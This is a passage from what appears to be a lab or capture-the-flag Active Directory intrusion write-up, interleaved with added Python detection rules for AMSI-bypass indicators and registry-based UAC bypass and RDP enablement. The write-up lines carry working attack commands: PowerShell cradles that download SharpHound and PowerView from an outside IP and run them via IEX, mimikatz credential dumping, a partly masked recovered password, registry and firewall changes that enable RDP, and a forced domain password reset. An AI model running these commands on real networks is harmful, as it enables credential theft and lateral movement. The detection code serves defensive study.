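    "block-2": "Get-ChildItem Env: | Where-Object { $_.Name -like '*Context*' }",
    "block-3": "[Ref].Assembly.GetTypes() | Select-Object -ExpandProperty Name | Sort-Object",
}


def score_block(text):
    """Return the sorted list of indicator names present in one script block."""
    return sorted(name for name, pattern in INDICATORS.items() if pattern.search(text))


def triage(blocks, threshold=THRESHOLD):
    """Return {block_id: indicators} for blocks that reach the threshold."""
    reported = {}
    for block_id, text in blocks.items():
        hits = score_block(text)
        if len(hits) >= threshold:
            reported[block_id] = hits
    return reported


if __name__ == "__main__":
    for block_id, hits in triage(SAMPLE_BLOCKS).items():
        print(block_id, hits)
```

The wildcard rules matter more than the literal one: the one-liner never writes "AmsiUtils" or "amsiContext" in full, which is exactly what defeats signature matching on those names while leaving the reflection sequence itself visible in the log.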

(new-object system.net.webclient).downloadstring('http://192.xxx.xxx.xxx/SharpHound.ps1') | IEX
Invoke-BloodHound -CollectionMethod All

Invoke-BloodHound -CollectionMethod All -Domain denkir-prod.com

hashdump admin02

mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "exit"

Found credentials for DENKIAIR\molly.dickinson:

D7oxxxxxxxx9fX

lateral movement as molly

Enable RDP:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh advfirewall firewall set rule group="remote desktop" new enable=yes

proxychains -q xfreerdp /v:172.xxx.xxx.xxx /u:matthew.lucas /p:Hxxxxxxxx_ +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /timeout:25000
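Two of the registry writes in this writeup are worth alerting on: the ms-settings\shell\open\command handler that fodhelper.exe honours (client01 section) and fDenyTSConnections being set to 0 (this section). As an added example (not part of the writeup), the Python below evaluates Sysmon Event ID 13 (RegistryEvent, value set) records against both. The records, the SID and the allowlist of images expected to toggle RDP are constructed; field names follow Sysmon's schema, and Sysmon renders DWORD values as "DWORD (0x00000000)".

```python
"""Detecting the ms-settings handler hijack and RDP enablement via the registry.

Added example, not from the writeup.  Evaluates Sysmon Event ID 13 records.
Rule 1: any value written under HKU\...\Software\Classes\ms-settings\shell\
open\command (nothing legitimate populates that key on a workstation).
Rule 2: fDenyTSConnections set to 0 by anything other than the Settings app.
Events and the allowlist are constructed for this example.
"""
import re

RULES = [
    {
        "name": "uac-bypass-ms-settings-handler",
        "target": re.compile(r"\\Software\\Classes\\ms-settings\\shell\\open\\command(\\|$)", re.I),
        "details": None,  # any value under this key is suspicious
    },
    {
        "name": "rdp-enabled-via-registry",
        "target": re.compile(r"\\Control\\Terminal Server\\fDenyTSConnections$", re.I),
        "details": re.compile(r"^DWORD \(0x00000000\)$"),  # Sysmon's rendering of DWORD 0
    },
]

# Constructed allowlist: the Settings app is the expected way to enable Remote Desktop.
ALLOWED_RDP_TOGGLERS = {r"c:\windows\immersivecontrolpanel\systemsettings.exe"}

SAMPLE_EVENTS = [  # constructed Sysmon ID 13 records
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\shell\open\command\(Default)",
     "Details": "powershell.exe -exec bypass -enc JABhAD0A"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\shell\open\command\DelegateExecute",
     "Details": ""},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\ImmersiveControlPanel\SystemSettings.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Program Files\App\setup.exe",
     "TargetObject": r"HKLM\Software\Classes\.txt\(Default)", "Details": "txtfile"},
]


def match_rules(event):
    """Return the names of the rules one registry event trips."""
    if event.get("EventID") != 13:
        return []
    names = []
    for rule in RULES:
        if not rule["target"].search(event.get("TargetObject", "")):
            continue
        if rule["details"] and not rule["details"].match(event.get("Details", "")):
            continue
        if rule["name"] == "rdp-enabled-via-registry" and \
                event.get("Image", "").lower() in ALLOWED_RDP_TOGGLERS:
            continue
        names.append(rule["name"])
    return names


def triage(events):
    """Return (Image, TargetObject, rule) for every event/rule match."""
    return [(e["Image"], e["TargetObject"], name) for e in events for name in match_rules(e)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The netsh firewall change in this section is the second half of the same action and is logged by the Windows Firewall With Advanced Security operational channel rather than by Sysmon; correlating the two on the same host within a short window gives a higher-confidence signal than either alone.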

In cmd run:

runas /user:DENKIAIR\molly.dickinson "powershell -ep bypass"

Lateral move from molly to kyle

(new-object system.net.webclient).downloadstring('http://192.xxx.xxx.xxx/PowerView.ps1') | IEX

Set-DomainUserPassword -Identity KYLE.COLE@DENKIAIR.COM -AccountPassword (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose

ShareLemon
Scan 172.16.106.112 with nmap and port 5000 is open.

Go to http://app01.denkiair.com:5000 from Edge and log in with the credential:

KYLE.COLE:Password123
